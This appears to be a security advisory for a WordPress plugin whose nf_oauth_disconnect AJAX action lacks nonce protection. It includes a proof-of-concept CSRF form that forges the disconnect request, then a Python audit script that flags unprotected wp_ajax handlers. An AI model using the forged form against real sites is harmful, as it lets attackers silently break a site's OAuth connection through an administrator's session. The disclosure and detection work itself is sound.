The plugin's wp_ajax_nf_oauth_disconnect AJAX action had no nonce protection, making it possible for attackers to craft a request that disconnects a site’s OAuth connection.
<html>
<body>
<form action="https://[URL_HERE]/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="nf_oauth_disconnect" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
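An added audit sketch in Python, not the plugin's code: it scans PHP source for `wp_ajax_*` hooks whose callback never calls a nonce-verification function, which is the gap described above. The sample PHP and its `example_*` names are constructed, and the matching is a heuristic that assumes string callbacks to plain functions and no braces inside strings or comments.

```python
import re

# Heuristic audit: wp_ajax_* hooks registered with a string callback name.
HOOK_RE = re.compile(
    r"add_action\(\s*['\"](wp_ajax_(?:nopriv_)?\w+)['\"]\s*,\s*['\"](\w+)['\"]")
NONCE_CALLS = ("check_ajax_referer", "wp_verify_nonce", "check_admin_referer")


def function_body(source, name):
    """Return the brace-delimited body of a PHP function, or None if absent."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", source)
    if not m:
        return None
    depth, i = 1, m.end()
    while i < len(source) and depth:
        depth += {"{": 1, "}": -1}.get(source[i], 0)
        i += 1
    return source[m.end():i - 1]


def unprotected_ajax_actions(source):
    """List (hook, callback) pairs whose callback body has no nonce check."""
    findings = []
    for hook, callback in HOOK_RE.findall(source):
        body = function_body(source, callback)
        if body is not None and not any(c in body for c in NONCE_CALLS):
            findings.append((hook, callback))
    return findings


# Constructed sample: one handler without a nonce check, one with it.
SAMPLE = r"""
add_action( 'wp_ajax_nf_oauth_disconnect', 'example_disconnect' );
add_action( 'wp_ajax_example_connect', 'example_connect' );
function example_disconnect() {
    if ( current_user_can( 'manage_options' ) ) {
        delete_option( 'example_oauth' );
    }
    wp_die();
}

function example_connect() {
    check_ajax_referer( 'example_connect', 'security' );
    update_option( 'example_oauth', 'token' );
    wp_die();
}
"""

if __name__ == "__main__":
    print(unprotected_ajax_actions(SAMPLE))
```

The capability check in the flagged handler does not help here: a forged request rides on the logged-in administrator's session, so only the nonce ties the request to a page the site itself rendered.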